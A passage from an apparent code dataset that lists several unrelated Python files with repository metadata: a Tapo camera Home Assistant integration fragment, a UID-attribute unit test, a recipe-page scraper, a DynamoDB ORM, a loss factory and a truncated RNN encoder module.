camData["alarm_mode"] = alarm_mode
try:
commonImageData = await hass.async_add_executor_job(controller.getCommonImage)
day_night_mode = commonImageData["image"]["common"]["inf_type"]
except Exception:
day_night_mode = None
camData["day_night_mode"] = day_night_mode
try:
led = await hass.async_add_executor_job(controller.getLED)
led = led["enabled"]
except Exception:
led = None
camData["led"] = led
try:
auto_track = await hass.async_add_executor_job(controller.getAutoTrackTarget)
auto_track = auto_track["enabled"]
except Exception:
auto_track = None
camData["auto_track"] = auto_track
if presets:
camData["presets"] = presets
else:
camData["presets"] = {}
return camData
async def update_listener(hass, entry):
"""Handle options update."""
host = entry.data.get(CONF_IP_ADDRESS)
username = entry.data.get(CONF_USERNAME)
password = entry.data.get(CONF_PASSWORD)
motionSensor = entry.data.get(ENABLE_MOTION_SENSOR)
cloud_password = entry.data.get(CLOUD_PASSWORD)
try:
if cloud_password != "":
tapoController = await hass.async_add_executor_job(
registerController, host, "admin", cloud_password
)
else:
tapoController = await hass.async_add_executor_job(
registerController, host, username, password
)
hass.data[DOMAIN][entry.entry_id]["controller"] = tapoController
except Exception:
LOGGER.error(
"Authentication to Tapo camera failed."
+ " Please restart the camera and try again."
)
for entity in hass.data[DOMAIN][entry.entry_id]["entities"]:
entity._host = host
entity._username = username
entity._password = password
if hass.data[DOMAIN][entry.entry_id]["events"]:
await hass.data[DOMAIN][entry.entry_id]["events"].async_stop()
if hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]:
await hass.config_entries.async_forward_entry_unload(entry, "binary_sensor")
hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = False
if motionSensor:
await setupOnvif(hass, entry, host, username, password)
async def setupOnvif(hass, entry, host, username, password):
hass.data[DOMAIN][entry.entry_id]["eventsDevice"] = await initOnvifEvents(
hass, host, username, password
)
if hass.data[DOMAIN][entry.entry_id]["eventsDevice"]:
hass.data[DOMAIN][entry.entry_id]["events"] = EventManager(
hass,
hass.data[DOMAIN][entry.entry_id]["eventsDevice"],
f"{entry.entry_id}_tapo_events",
)
hass.data[DOMAIN][entry.entry_id]["eventsSetup"] = await setupEvents(
hass, entry
)
async def setupEvents(hass, entry):
if not hass.data[DOMAIN][entry.entry_id]["events"].started:
events = hass.data[DOMAIN][entry.entry_id]["events"]
if await events.async_start():
if not hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]:
hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = True
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(
entry, "binary_sensor"
)
)
return True
else:
return False
| [((15, 11, 15, 41), 'pytapo.Tapo', 'Tapo', ({(15, 16, 15, 20): 'host', (15, 22, 15, 30): 'username', (15, 32, 15, 40): 'password'}, {}), '(host, username, password)', False, 'from pytapo import Tapo\n'), ((20, 13, 20, 55), 'haffmpeg.tools.ImageFrame', 'ImageFrame', (), '', False, 'from haffmpeg.tools import IMAGE_JPEG, ImageFrame\n'), ((169, 54, 173, 9), 'homeassistant.components.onvif.event.EventManager', 'EventManager', ({(170, 12, 170, 16): 'hass', (171, 12, 171, 61): "hass.data[DOMAIN][entry.entry_id]['eventsDevice']", (172, 12, 172, 43): 'f"""{entry.entry_id}_tapo_events"""'}, {}), "(hass, hass.data[DOMAIN][entry.entry_id]['eventsDevice'],\n f'{entry.entry_id}_tapo_events')", False, 'from homeassistant.components.onvif.event import EventManager\n'), ((39, 11, 39, 42), 'os.path.dirname', 'os.path.dirname', ({(39, 27, 39, 41): 'onvif.__file__'}, {}), '(onvif.__file__)', False, 'import os\n')] |
mamrhein/CAmD3 | camd3/infrastructure/component/tests/test_uidattr.py | d20f62295771a297c3fbb314beef314e5ec7a2b5 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Name: test_uidattr
# Purpose: Test driver for module 'uidattr'
#
# Author: Michael Amrhein ([email protected])
#
# Copyright: (c) 2018 Michael Amrhein
# ----------------------------------------------------------------------------
# $Source$
# $Revision$
"""Test driver for module 'uidattr'"""
import unittest
from uuid import uuid1
from camd3.infrastructure.component import (
Component, register_utility, UniqueIdAttribute)
from camd3.infrastructure.component.idfactories import (
UUIDGenerator, uuid_generator)
# factory for UUIDs
def custom_uuid_generator() -> UUIDGenerator: # noqa: D103
while True:
yield uuid1()
class ExplID(Component):
id = UniqueIdAttribute(uid_gen=custom_uuid_generator())
def __init__(self):
self.__class__.id.set_once(self)
class ImplID(Component):
id = UniqueIdAttribute()
def __init__(self):
self.__class__.id.set_once(self)
class UniqueIdAttributeTest(unittest.TestCase):
def setUp(self):
register_utility(uuid_generator(), UUIDGenerator)
self.cid = ImplID()
def test_init(self):
cid = ImplID()
self.assertIsNotNone(cid.id)
self.assertIsNotNone(cid._id)
def test_uniqueness(self):
ids = {self.cid.id}
for i in range(10):
cid = ExplID()
self.assertNotIn(cid.id, ids)
ids.add(cid.id)
if __name__ == '__main__': # pragma: no cover
unittest.main()
| [((43, 9, 43, 28), 'camd3.infrastructure.component.UniqueIdAttribute', 'UniqueIdAttribute', ({}, {}), '()', False, 'from camd3.infrastructure.component import Component, register_utility, UniqueIdAttribute\n'), ((69, 4, 69, 19), 'unittest.main', 'unittest.main', ({}, {}), '()', False, 'import unittest\n'), ((30, 14, 30, 21), 'uuid.uuid1', 'uuid1', ({}, {}), '()', False, 'from uuid import uuid1\n'), ((52, 25, 52, 41), 'camd3.infrastructure.component.idfactories.uuid_generator', 'uuid_generator', ({}, {}), '()', False, 'from camd3.infrastructure.component.idfactories import UUIDGenerator, uuid_generator\n')] |
tn012604409/HW3_chatRobot | s.py | 97762e53bfccd8b30c6b263792919c679e53b404 | import requests
import time
from bs4 import BeautifulSoup
def get_web_page(url):
resp = requests.get(
url=url,
)
if resp.status_code != 200:
print('Invalid url:', resp.url)
return None
else:
return resp.text
def get_articles(dom):
soup = BeautifulSoup(dom, 'html.parser')
tag = soup.find_all('a','recipe-name')
articles=tag
return articles
def run():
page = get_web_page('https://icook.tw/recipes/popular?ref=icook-footer')
if page:
current_articles = get_articles(page)
i=1
s=''
for post in current_articles:
temp=str(post)
num=int(temp.find("\" href="))
#print('The Number {0}: {1}'.format(i, temp[35:num]))
s=s+'The Number {0}: {1}\n'.format(i, temp[35:num])
i=i+1
return s
| [((7, 11, 9, 5), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((18, 11, 18, 44), 'bs4.BeautifulSoup', 'BeautifulSoup', ({(18, 25, 18, 28): 'dom', (18, 30, 18, 43): '"""html.parser"""'}, {}), "(dom, 'html.parser')", False, 'from bs4 import BeautifulSoup\n')] |
k2bd/awstin | awstin/dynamodb/orm.py | 7360cc20d3c72a6aa87de57146b9c5f4247c58d5 | import uuid
from abc import ABC, abstractmethod
from collections import defaultdict
from typing import Union
from boto3.dynamodb.conditions import Attr as BotoAttr
from boto3.dynamodb.conditions import Key as BotoKey
from awstin.dynamodb.utils import from_decimal, to_decimal
class NotSet:
"""
A value of an attribute on a data model is not present in a DynamoDB result
"""
def __str__(self):
return "<<Attribute not set>>"
def __repr__(self):
return "<<Attribute not set>>"
NOT_SET = NotSet()
class BaseAttribute:
def __init__(self, attribute_name: Union[str, None] = None):
"""
Parameters
----------
attribute_name : str, optional
Name of the property in the DynamoDB table. Defaults to the name of
the attribute on the DynamoModel class.
"""
# Set by user
self._attribute_name = attribute_name
# Set by Model
self._name_on_model = None
@property
def _awstin_name(self):
if self._attribute_name is not None:
return self._attribute_name
else:
return self._name_on_model
def __getattr__(self, name):
"""
Support for nested mapping queries
"""
try:
return super().__getattr__(name)
except AttributeError:
return type(self)(attribute_name=f"{self._awstin_name}.{name}")
def __getitem__(self, index):
"""
Support for nested container queries
"""
return type(self)(attribute_name=f"{self._awstin_name}[{index}]")
# --- Query and scan filter expressions ---
def begins_with(self, value):
"""
Filter results by a key or attribute beginning with a value
Parameters
----------
value : str
Starting string for returned results
"""
return self._query_type(self._awstin_name).begins_with(to_decimal(value))
def between(self, low, high):
"""
Filter results by range (inclusive)
Parameters
----------
low : Any
Low end of the range
high : Any
High end of the range
"""
return self._query_type(self._awstin_name).between(
to_decimal(low),
to_decimal(high),
)
def __eq__(self, value):
return self._query_type(self._awstin_name).eq(to_decimal(value))
def __gt__(self, value):
return self._query_type(self._awstin_name).gt(to_decimal(value))
def __ge__(self, value):
return self._query_type(self._awstin_name).gte(to_decimal(value))
def __lt__(self, value):
return self._query_type(self._awstin_name).lt(to_decimal(value))
def __le__(self, value):
return self._query_type(self._awstin_name).lte(to_decimal(value))
def attribute_type(self, value):
"""
Filter results by attribute type
Parameters
----------
value : str
Index for a DynamoDB attribute type (e.g. "N" for Number)
"""
return BotoAttr(self._awstin_name).attribute_type(to_decimal(value))
def contains(self, value):
"""
Filter results by attributes that are containers and contain the target
value
Parameters
----------
values : Any
Result must contain this item
"""
return BotoAttr(self._awstin_name).contains(to_decimal(value))
def exists(self):
"""
Filter results by existence of an attribute
"""
return BotoAttr(self._awstin_name).exists()
def in_(self, values):
"""
Filter results by existence in a set
Parameters
----------
values : list of Any
Allowed values of returned results
"""
in_values = [to_decimal(value) for value in values]
return BotoAttr(self._awstin_name).is_in(in_values)
def __ne__(self, value):
return BotoAttr(self._awstin_name).ne(to_decimal(value))
def not_exists(self):
"""
Filter results by non-existence of an attribute
"""
return BotoAttr(self._awstin_name).not_exists()
def size(self):
"""
Filter by size of a collection
"""
return Size(self._awstin_name)
# --- Update expressions ---
def set(self, expression):
"""
Set an attribute to a new value.
Corresponds to SET as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
New value, or an expression defining a new value
"""
return SetOperator(self, UpdateOperand(expression))
def remove(self):
"""
Remove an attribute.
Corresponds to REMOVE as part of the update expression in
``Table.update_item``.
"""
return RemoveOperator(self)
def add(self, expression):
"""
Add to an attribute (numerical add or addition to a set).
Corresponds to ADD as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
Value to add
"""
return AddOperator(self, UpdateOperand(expression))
def delete(self, expression):
"""
Delete part of a set attribute.
Corresponds to DELETE as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
Value to delete
"""
return DeleteOperator(self, UpdateOperand(expression))
def __add__(self, other):
return CombineOperand(UpdateOperand(self), UpdateOperand(other), "+")
def __sub__(self, other):
return CombineOperand(UpdateOperand(self), UpdateOperand(other), "-")
def __radd__(self, other):
return CombineOperand(UpdateOperand(other), UpdateOperand(self), "+")
def __rsub__(self, other):
return CombineOperand(UpdateOperand(other), UpdateOperand(self), "-")
def if_not_exists(self, value):
"""
Conditionally return a value if this attribute doesn't exist on the
model
"""
return IfNotExistsOperand(UpdateOperand(self), UpdateOperand(value))
class Key(BaseAttribute):
"""
Used to define and query hash and sort key attributes on a dynamodb table
data model
"""
_query_type = BotoKey
class Attr(BaseAttribute):
"""
Used to define and query non-key attributes on a dynamodb table data model
"""
_query_type = BotoAttr
def size_query(self, *args, **kwargs):
return BotoAttr(self._awstin_name).size()
class Size(BaseAttribute):
_query_type = size_query
class DynamoModelMeta(type):
def __getattribute__(self, name):
attr = super().__getattribute__(name)
if isinstance(attr, BaseAttribute):
attr._name_on_model = name
return attr
else:
return attr
def _dynamodb_attributes(self):
result = {
getattr(self, attr)._awstin_name: attr
for attr in dir(self)
if isinstance(getattr(self, attr), BaseAttribute)
}
return result
def _get_kwargs(self):
"""
Kwargs that should be passed to query, scan, get_item
"""
return {
**self._dynamo_projection(),
**self._index_kwargs(),
}
def _dynamo_projection(self):
"""
Attributes to request when retrieving data from DynamoDB
Returns
-------
dict
kwargs to be passed to DynamoDB get attribute calls to employ
a projection expression and placeholders
"""
placeholders = {
"#" + str(uuid.uuid4())[:8]: value
for value in self._dynamodb_attributes().keys()
}
expression = ", ".join(placeholders.keys())
return dict(
ProjectionExpression=expression,
ExpressionAttributeNames=placeholders,
)
def _index_kwargs(self):
if hasattr(self, "_index_name_"):
return dict(
IndexName=self._index_name_,
)
else:
return {}
class DynamoModel(metaclass=DynamoModelMeta):
"""
Class defining an ORM model for a DynamoDB table.
Subclasses must have a ``_table_name_`` attribute. Attributes making up
the data model should be Attr or Key instances.
Subclasses representing indexes should also have an ``_index_name_``
attribute
"""
def __init__(self, **kwargs):
"""
Parameters
----------
**kwargs : dict of (str, Any)
Initialization of Attr and Key attributes.
"""
model_attrs = type(self)._dynamodb_attributes().values()
for name in model_attrs:
setattr(self, name, NOT_SET)
for name, value in kwargs.items():
if name not in model_attrs:
msg = f"{type(self)!r} has no attribute {name!r}"
raise AttributeError(msg)
setattr(self, name, value)
@classmethod
def deserialize(cls, data):
"""
Deserialize JSON into a DynamoModel subclass. Internally converts
Decimal to float in the deserialization.
Parameters
----------
data : dict of (str, Any)
Serialized model
Returns
-------
DynamoModel
The deserialized data model
"""
model_attrs = cls._dynamodb_attributes()
result = cls()
for attr in model_attrs.values():
setattr(result, attr, NOT_SET)
for db_attr, value in data.items():
if db_attr in model_attrs.keys():
if type(value) in [list, set, tuple]:
value = type(value)(from_decimal(v) for v in value)
elif type(value) is dict:
value = {from_decimal(k): from_decimal(v) for k, v in value.items()}
else:
value = from_decimal(value)
setattr(result, model_attrs[db_attr], value)
return result
def serialize(self):
"""
Serialize a DynamoModel subclass to JSON that can be inserted into
DynamoDB. Internally converts float to Decimal.
Returns
-------
dict of (str, Any)
The serialized JSON entry
"""
model_attrs = type(self)._dynamodb_attributes()
result = {}
for dynamo_name, model_name in model_attrs.items():
value = getattr(self, model_name)
if value is not NOT_SET:
if type(value) in [list, set, tuple]:
value = type(value)(to_decimal(v) for v in value)
elif type(value) is dict:
value = {to_decimal(k): to_decimal(v) for k, v in value.items()}
else:
value = to_decimal(value)
result[dynamo_name] = value
return result
# ---- Update Operators
class UpdateOperator(ABC):
"""
A representation of an UpdateItem expression
"""
def __and__(self, other):
"""
Combine two update expressions
"""
return CombineOperator(self, other)
@abstractmethod
def update_dict(self):
pass
@staticmethod
def update_expression(update_dict):
expressions = []
for operation in "SET", "ADD", "DELETE", "REMOVE":
if update_dict.get(operation):
expressions.append(operation + " " + ", ".join(update_dict[operation]))
return " ".join(expressions)
def serialize(self):
"""
Produce kwargs to be passed to DynamoDB Table.update_item.
Keys and values are:
"UpdateExpression": string representing the update expression
"ExpressionAttributeNames": Placeholder map for attribute names
"ExpressionAttributeValues": Placeholder map for attribute values
Returns
-------
dict
Kwargs for update_item
"""
update_dict = self.update_dict()
result = {
"UpdateExpression": self.update_expression(update_dict),
}
if update_dict["ExpressionAttributeNames"]:
result["ExpressionAttributeNames"] = update_dict["ExpressionAttributeNames"]
if update_dict["ExpressionAttributeValues"]:
result["ExpressionAttributeValues"] = update_dict[
"ExpressionAttributeValues"
]
return result
class CombineOperator(UpdateOperator):
"""
Combine two update expressions
"""
def __init__(self, left, right):
self.left = left
self.right = right
def update_dict(self):
result = defaultdict(list)
ser_left = self.left.update_dict()
ser_right = self.right.update_dict()
items = list(ser_left.items()) + list(ser_right.items())
for key, values in items:
if key in ["SET", "ADD", "DELETE", "REMOVE"]:
result[key].extend(values)
result["ExpressionAttributeNames"] = dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
)
result["ExpressionAttributeValues"] = dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
)
return result
class SetOperator(UpdateOperator):
"""
Support for SET
"""
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"SET": [
f"{serialized_attr['UpdateExpression']} = "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
class AddOperator(UpdateOperator):
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"ADD": [
f"{serialized_attr['UpdateExpression']} "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
class RemoveOperator(UpdateOperator):
def __init__(self, attr):
self.attr = attr
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
return {
"REMOVE": [serialized_attr["UpdateExpression"]],
"ExpressionAttributeNames": serialized_attr["ExpressionAttributeNames"],
"ExpressionAttributeValues": {},
}
class DeleteOperator(UpdateOperator):
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"DELETE": [
f"{serialized_attr['UpdateExpression']} "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
# ---- Update Operands
def serialize_operand(value):
name = str(uuid.uuid4())[:8]
if isinstance(value, UpdateOperand):
return value.serialize()
elif isinstance(value, BaseAttribute):
return itemize_attr(value)
elif type(value) in [list, set, tuple]:
name = ":" + name
value = type(value)([to_decimal(v) for v in value])
return {
"UpdateExpression": name,
"ExpressionAttributeNames": {},
"ExpressionAttributeValues": {name: value},
}
else:
name = ":" + name
return {
"UpdateExpression": name,
"ExpressionAttributeNames": {},
"ExpressionAttributeValues": {name: to_decimal(value)},
}
def itemize_attr(attr):
# Separate indexes
parts = []
current_section = ""
for letter in attr._awstin_name:
if letter == "[":
parts.append(current_section)
current_section = "["
elif letter == "]":
parts.append(current_section + "]")
current_section = ""
else:
current_section += letter
if current_section:
parts.append(current_section)
serialized = ""
name_map = {}
# Separate attributes
for part in parts:
if "[" in part and "]" in part:
serialized += part
else:
if part.startswith("."):
serialized += "."
part = part[1:]
sections = part.split(".")
serialized_sections = []
for section in sections:
name = "#" + str(uuid.uuid4())[:8]
name_map[name] = section
serialized_sections.append(name)
serialized += ".".join(serialized_sections)
result = {
"UpdateExpression": serialized,
"ExpressionAttributeNames": name_map,
"ExpressionAttributeValues": {},
}
return result
class UpdateOperand:
"""
Inner part of an update expression
"""
def __init__(self, value):
self.value = value
def serialize(self):
return serialize_operand(self.value)
class CombineOperand(UpdateOperand):
"""
Add or subtact two expressions
"""
def __init__(self, left, right, symbol):
self.left = left
self.right = right
self.symbol = symbol
def serialize(self):
ser_left = serialize_operand(self.left)
ser_right = serialize_operand(self.right)
expression = (
f"{ser_left['UpdateExpression']} "
f"{self.symbol} "
f"{ser_right['UpdateExpression']}"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
),
}
class IfNotExistsOperand(UpdateOperand):
"""
Set a value if the given attribute does not exist
"""
def __init__(self, attr, value):
self.attr = attr
self.value = value
def serialize(self):
ser_attr = serialize_operand(self.attr)
ser_value = serialize_operand(self.value)
expression = (
f"if_not_exists({ser_attr['UpdateExpression']}, "
f"{ser_value['UpdateExpression']})"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_attr["ExpressionAttributeNames"],
**ser_value["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_attr["ExpressionAttributeValues"],
**ser_value["ExpressionAttributeValues"],
),
}
class ListAppendOperand(UpdateOperand):
"""
Combine two lists
"""
def __init__(self, left, right):
self.left = left
self.right = right
def serialize(self):
ser_left = serialize_operand(self.left)
ser_right = serialize_operand(self.right)
expression = (
f"list_append({ser_left['UpdateExpression']}, "
f"{ser_right['UpdateExpression']})"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
),
}
def list_append(left, right):
"""
Set a value to the combination of two lists in an update expression
"""
return ListAppendOperand(UpdateOperand(left), UpdateOperand(right))
| [((470, 17, 470, 34), 'collections.defaultdict', 'defaultdict', ({(470, 29, 470, 33): 'list'}, {}), '(list)', False, 'from collections import defaultdict\n'), ((75, 63, 75, 80), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(75, 74, 75, 79): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((89, 12, 89, 27), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(89, 23, 89, 26): 'low'}, {}), '(low)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((90, 12, 90, 28), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(90, 23, 90, 27): 'high'}, {}), '(high)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((94, 54, 94, 71), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(94, 65, 94, 70): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((97, 54, 97, 71), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(97, 65, 97, 70): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((100, 55, 100, 72), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(100, 66, 100, 71): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((103, 54, 103, 71), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(103, 65, 103, 70): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((106, 55, 106, 72), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(106, 66, 106, 71): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((117, 58, 117, 75), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(117, 69, 117, 74): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((129, 52, 129, 69), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(129, 63, 129, 68): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((146, 21, 146, 38), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(146, 32, 146, 37): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((150, 46, 150, 63), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(150, 57, 150, 62): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((251, 11, 251, 38), 'boto3.dynamodb.conditions.Attr', 'BotoAttr', ({(251, 20, 251, 37): 'self._awstin_name'}, {}), '(self._awstin_name)', True, 'from boto3.dynamodb.conditions import Attr as BotoAttr\n'), ((588, 15, 588, 27), 'uuid.uuid4', 'uuid.uuid4', ({}, {}), '()', False, 'import uuid\n'), ((117, 15, 117, 42), 'boto3.dynamodb.conditions.Attr', 'BotoAttr', ({(117, 24, 117, 41): 'self._awstin_name'}, {}), '(self._awstin_name)', True, 'from boto3.dynamodb.conditions import Attr as BotoAttr\n'), ((129, 15, 129, 42), 'boto3.dynamodb.conditions.Attr', 'BotoAttr', ({(129, 24, 129, 41): 'self._awstin_name'}, {}), '(self._awstin_name)', True, 'from boto3.dynamodb.conditions import Attr as BotoAttr\n'), ((135, 15, 135, 42), 'boto3.dynamodb.conditions.Attr', 'BotoAttr', ({(135, 24, 135, 41): 'self._awstin_name'}, {}), '(self._awstin_name)', True, 'from boto3.dynamodb.conditions import Attr as BotoAttr\n'), ((147, 15, 147, 42), 'boto3.dynamodb.conditions.Attr', 'BotoAttr', ({(147, 24, 147, 41): 'self._awstin_name'}, {}), '(self._awstin_name)', True, 'from boto3.dynamodb.conditions import Attr as BotoAttr\n'), ((150, 15, 150, 42), 'boto3.dynamodb.conditions.Attr', 'BotoAttr', ({(150, 24, 150, 41): 'self._awstin_name'}, {}), '(self._awstin_name)', True, 'from boto3.dynamodb.conditions import Attr as BotoAttr\n'), ((156, 15, 156, 42), 'boto3.dynamodb.conditions.Attr', 'BotoAttr', ({(156, 24, 156, 41): 'self._awstin_name'}, {}), '(self._awstin_name)', True, 'from boto3.dynamodb.conditions import Attr as BotoAttr\n'), ((295, 22, 295, 34), 'uuid.uuid4', 'uuid.uuid4', ({}, {}), '()', False, 'import uuid\n'), ((372, 28, 372, 47), 'awstin.dynamodb.utils.from_decimal', 'from_decimal', ({(372, 41, 372, 46): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((399, 28, 399, 45), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(399, 39, 399, 44): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((597, 29, 597, 42), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(597, 40, 597, 41): 'v'}, {}), '(v)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((609, 48, 609, 65), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(609, 59, 609, 64): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((368, 40, 368, 55), 'awstin.dynamodb.utils.from_decimal', 'from_decimal', ({(368, 53, 368, 54): 'v'}, {}), '(v)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((370, 29, 370, 44), 'awstin.dynamodb.utils.from_decimal', 'from_decimal', ({(370, 42, 370, 43): 'k'}, {}), '(k)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((370, 46, 370, 61), 'awstin.dynamodb.utils.from_decimal', 'from_decimal', ({(370, 59, 370, 60): 'v'}, {}), '(v)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((395, 40, 395, 53), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(395, 51, 395, 52): 'v'}, {}), '(v)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((397, 29, 397, 42), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(397, 40, 397, 41): 'k'}, {}), '(k)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((397, 44, 397, 57), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(397, 55, 397, 56): 'v'}, {}), '(v)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((645, 33, 645, 45), 'uuid.uuid4', 'uuid.uuid4', ({}, {}), '()', False, 'import uuid\n')] |
SimonTheVillain/ActiveStereoNet | Losses/__init__.py | 708bddce844998b366be1a1ec8a72a31ccd26f8c | from .supervise import *
def get_losses(name, **kwargs):
name = name.lower()
if name == 'rhloss':
loss = RHLoss(**kwargs)
elif name == 'xtloss':
loss = XTLoss(**kwargs)
else:
raise NotImplementedError('Loss [{:s}] is not supported.'.format(name))
return loss
| [] |
qkaren/converse_reading_cmr | model/src/recurrent.py | d06d981be12930cff8458e2b1b81be4f5df3a329 | import torch
import torch.nn as nn
from torch.nn.parameter import Parameter
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.nn.utils.rnn import pack_padded_sequence as pack
from .my_optim import weight_norm as WN
# TODO: use system func to bind ~
RNN_MAP = {'lstm': nn.LSTM, 'gru': nn.GRU, 'rnn': nn.RNN}
class OneLayerBRNN(nn.Module):
def __init__(self, input_size, hidden_size, prefix='stack_rnn', opt={}, dropout=None):
super(OneLayerBRNN, self).__init__()
self.opt = opt
self.prefix = prefix
self.cell_type = self.opt.get('{}_cell'.format(self.prefix), 'lstm')
self.emb_dim = self.opt.get('{}_embd_dim'.format(self.prefix), 0)
self.maxout_on = self.opt.get('{}_maxout_on'.format(self.prefix), False)
self.weight_norm_on = self.opt.get('{}_weight_norm_on'.format(self.prefix), False)
self.dropout = dropout
self.output_size = hidden_size if self.maxout_on else hidden_size * 2
self.hidden_size = hidden_size
self.rnn = RNN_MAP[self.cell_type](input_size, hidden_size, num_layers=1, bidirectional=True)
def forward(self, x, x_mask):
x = x.transpose(0, 1)
size = list(x.size())
rnn_output, h = self.rnn(x)
if self.maxout_on:
rnn_output = rnn_output.view(size[0], size[1], self.hidden_size, 2).max(-1)[0]
# Transpose back
hiddens = rnn_output.transpose(0, 1)
return hiddens
class BRNNEncoder(nn.Module):
def __init__(self, input_size, hidden_size, prefix='rnn', opt={}, dropout=None):
super(BRNNEncoder, self).__init__()
self.opt = opt
self.dropout = dropout
self.cell_type = opt.get('{}_cell'.format(self.prefix), 'gru')
self.weight_norm_on = opt.get('{}_weight_norm_on'.format(self.prefix), False)
self.top_layer_only = opt.get('{}_top_layer_only'.format(self.prefix), False)
self.num_layers = opt.get('{}_num_layers'.format(self.prefix), 1)
self.rnn = RNN_MAP[self.cell_type](input_size, hidden_size, self.num_layers, bidirectional=True)
if self.weight_norm_on:
self.rnn = WN(self.rnn)
if self.top_layer_only:
self.output_size = hidden_size * 2
else:
self.output_size = self.num_layers * hidden_size * 2
def forward(self, x, x_mask):
x = self.dropout(x)
_, h = self.rnn(x.transpose(0, 1).contiguous())
if self.cell_type == 'lstm':
h = h[0]
shape = h.size()
h = h.view(self.num_layers, 2, shape[1], shape[3]).transpose(1,2).contiguous()
h = h.view(self.num_layers, shape[1], 2 * shape[3])
if self.top_layer_only:
